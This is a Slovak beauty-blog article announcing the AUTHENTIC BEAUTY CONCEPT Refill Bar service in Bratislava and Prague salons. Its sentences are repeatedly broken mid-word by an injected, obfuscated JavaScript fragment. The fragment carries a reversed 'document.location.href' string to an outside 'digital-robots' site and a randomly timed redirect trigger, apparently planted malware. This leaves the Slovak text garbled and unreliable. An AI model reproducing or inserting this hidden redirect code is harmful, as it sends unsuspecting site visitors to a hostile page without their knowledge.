Refill bar od AUTHENTIC BEAUTY CONCEPT Služba dostupná v Bratislave aj Prahe

| jún 24, 2021

Značka prémiovej vlasovej kozmetiky AUTHENTIC BEAUTY CONCEPT spúšťa v Bratislave a Prahe novúslužbu Refill Bar. Tá umožňuje doplniť si svoj obľúbený produkt vlasovej kozmetiky AUTHENTIC BEAUTY CONCEPT do opakovane použiteľnej fľaše z unikátnej doplňovacej stanice. Značka ide zase o veľkrok ďalej vo svojom udržateľnom prístupe a vy vďaka nej môžete znížiť svoju ekologickú stobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topu.

Refill Bar na Slovensku a v Čechách

Značka AUTHENTIC BEAUTY CONCEPT nanovo spúšťaslužbu na dopĺňanie vlasovej kozmetiky do zákazníkom donesených fľašiek na Slovensku, aj v Českej republike. Vďaka tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu AUTHENTIC BEAUTY CONCEPT Refill Bar predlžuje život pôvodne jednorazovej plastobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovej fľaši. Prvým salónom, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torý tútobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to službu na Slovensku spustil je bratislavský salón Strokoway. V Českej republike ju ponúka pražský salón Hairthusiasts.

A ako tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to funguje? Jednoducho! Kaderník vám poskytne osobnú profesionálnu konzultáciu a odporučí vhodné produkty AUTHENTIC BEAUTY CONCEPT. Vybrané produkty vám naplní z Refill Baru do fľaše vyrobenej z recyklovateľného plastu. Fľašu potobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom označí etiketobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou na biologickej báze. Hneď, ako produkt doma spotrebujete, nevyhodíte prázdnu fľašku do koša ani do triedeného odpadu, ale znova ju prinesiete do salónu, kde sa opätobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovne doplní vašou obľúbenou vlasovou kozmetikou. A jej životný cyklus môže začať nanovo.

Udržateľný prístup a AUTHENTIC BEAUTY CONCEPT

 Značka vlasovej kozmetiky AUTHENTIC BEAUTY CONCEPT sa od svojho vzniku snaží o udržateľný prístup. Všetky jej fľaše, nádoby a plechovky sú recyklovateľ, do svojich prípravkov používa len starostlivo vybrané ingrediencie s free from vegánskymi receptúrami, podporuje iniciatívu za udržateľnosť rastliny guar (ingredienciu, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá sa stará o vlasy a pokožku) a tiež etický spôsob získavaniaextraktu z fialovej ryže. Vegánske produkty sú registrované voVegan SocietyÔ, nákupné tašky sú vyrobené z recyklovateľného papiera, materiály pre salón sú tlačené atramentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom bez minerálneho oleja na vegánskom, biologicky rozložiteľnom papieri s FSC certifikátobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom a všetky AUTHENTIC BEAUTY CONCEPT uteráky pre salóny sú zostobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topercentnej Fairetrade organickej bavlny.

Tags:

Category: HAIR & MAKEUP, HOMEPAGE, TRENDY & SHOPPING

Comments are closed.